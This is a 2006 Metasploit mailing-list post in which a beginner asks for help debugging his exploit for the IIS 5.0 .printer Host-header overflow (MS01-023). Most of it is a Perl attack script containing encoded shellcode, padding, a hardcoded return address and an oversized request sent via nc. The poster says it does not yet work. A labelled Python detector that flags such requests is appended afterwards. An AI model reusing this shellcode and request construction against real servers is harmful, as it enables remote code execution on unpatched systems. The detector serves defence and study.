Metasploit mailing list archives
iis50_printer_overflow
From: sonixxfx at gmail.com (Sonixxfx)
Date: Thu, 2 Mar 2006 21:49:11 +0100
Hi,

I am trying to write an exploit for the "iis50_printer_overflow" vulnerability (http://www.osvdb.org/3323, http://www.microsoft.com/technet/security/bulletin/MS01-023.mspx, http://seclists.org/lists/bugtraq/2001/May/0005.html, http://milw0rm.com/metasploit.php?id=27), but I run into a problem. It is the first time I am doing this and I cannot write in C. I have read the excellent part Vinnie Liu wrote about writing exploits, but I cannot find enough info in it to solve my problem.

The problem seems to be that I have little space available after the return address for the payload. I believe there is something about 240 bytes available. So my question is: how can I make use of both the space available after the return address and the space before the return address? There are 268 bytes available before the return address. I have made use of a "call esp" opcode because I saw my attack string in esp in OllyDbg. I saw an exploit online that makes use of the same vulnerability, but it seems to be using a "call ebx" opcode, so I used a "call ebx" opcode too, but also without result.

Below is the Perl script that I have written. I have determined bad characters, decoded, etc., but when I try this with OllyDbg nothing seems to change in Olly and inetinfo keeps running. Please keep in mind that I am a n00b on this subject.

This is my Perl program:

# encoded payload, placed after the return address
$payload = "\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff".
"\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56".
"\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58".
"\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44".
"\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d".
"\x4e\x4f\x4a\x4e\x46\x34\x42\x50\x42\x50\x42\x50\x4b\x38\x45\x44".
"\x4e\x33\x4b\x38\x4e\x37\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48".
"\x4f\x44\x4a\x51\x4b\x48\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x54".
"\x4b\x58\x46\x53\x4b\x38\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39".
"\x4e\x4a\x46\x58\x42\x4c\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30".
"\x41\x50\x44\x4c\x4b\x4e\x46\x4f\x4b\x43\x46\x55\x46\x42\x46\x50".
"\x45\x57\x45\x4e\x4b\x38\x4f\x35\x46\x52\x41\x50\x4b\x4e\x48\x46".
"\x4b\x38\x4e\x50\x4b\x34\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e".
"\x4b\x58\x4e\x41\x4b\x38\x41\x50\x4b\x4e\x49\x58\x4e\x45\x46\x42".
"\x46\x50\x43\x4c\x41\x43\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x53".
"\x45\x38\x42\x4c\x4a\x47\x4e\x50\x4b\x58\x42\x54\x4e\x30\x4b\x58".
"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x4a\x56\x4a\x50\x4b\x4e\x49\x50".
"\x4b\x38\x42\x58\x42\x4b\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36".
"\x4e\x33\x4f\x45\x41\x33\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f".
"\x43\x58\x42\x4c\x4b\x37\x42\x45\x4a\x56\x42\x4f\x4c\x38\x46\x50".
"\x4f\x55\x4a\x36\x4a\x49\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f".
"\x47\x4e\x49\x36\x42\x37\x43\x36\x4f\x56\x50\x56\x48\x36\x49\x36".
"\x47\x46\x42\x30\x5a";

$string = "GET /";
$string .= "NULL.printer HTTP/1.0\r\n";
$string .= "Host: ";
$string .= "A" x 268;                 # 268 bytes of padding before the return address
$string .= "\xf3\x45\x2c\x73";        # return address
$string .= $payload;                  # payload after the return address
$string .= "\r\n\r\n";

open (NC, "|nc.exe 127.0.0.1 80");
print NC $string;
close(NC);

I hope I have included enough information. I am a bit tired at the moment.

B.t.w. Nice looking man this morning on your website Metasploit ;)

Thanks

Regards,
Ben
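A defender-side check for the request shape the post describes (a .printer target carrying an oversized, binary Host header, the pattern behind MS01-023). This is an added example, not code from the post or from Metasploit; the 255-byte threshold, the function names and the sample requests are constructed assumptions.

```python
import re

# Heuristic limits for this check (constructed assumptions, not from the post).
# MS01-023 was triggered by an oversized Host header on a .printer request, so
# anything past a sane hostname length on such a request is worth flagging.
MAX_HOST_LEN = 255                      # RFC 1035 hostname limit, used as threshold
PRINTER_PATH = re.compile(rb"\.printer(\?|$)", re.IGNORECASE)

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request head into (method, target, {name: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:                 # malformed request line
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers

def check_printer_request(raw: bytes) -> dict:
    """Return a verdict describing why a request looks like MS01-023 traffic."""
    parsed = parse_request(raw)
    if parsed is None:
        return {"suspicious": False, "host_len": 0, "reasons": ["unparseable request line"]}
    _method, target, headers = parsed
    host = headers.get(b"host", b"")
    reasons = []
    if PRINTER_PATH.search(target):     # only the .printer ISAPI path is of interest
        if len(host) > MAX_HOST_LEN:
            reasons.append(f"Host header is {len(host)} bytes on a .printer request")
        if any(b < 0x20 or b > 0x7E for b in host):
            reasons.append("non-printable bytes in Host header")
    return {"suspicious": bool(reasons), "host_len": len(host), "reasons": reasons}

# Constructed samples: a normal request and one shaped like the post's attack string
BENIGN = b"GET /index.html HTTP/1.0\r\nHost: intranet.example\r\n\r\n"
ATTACK_SHAPED = (b"GET /NULL.printer HTTP/1.0\r\nHost: " + b"A" * 268
                 + b"\xf3\x45\x2c\x73" + b"\x90" * 16 + b"\r\n\r\n")

if __name__ == "__main__":
    for sample in (BENIGN, ATTACK_SHAPED):
        print(check_printer_request(sample))
```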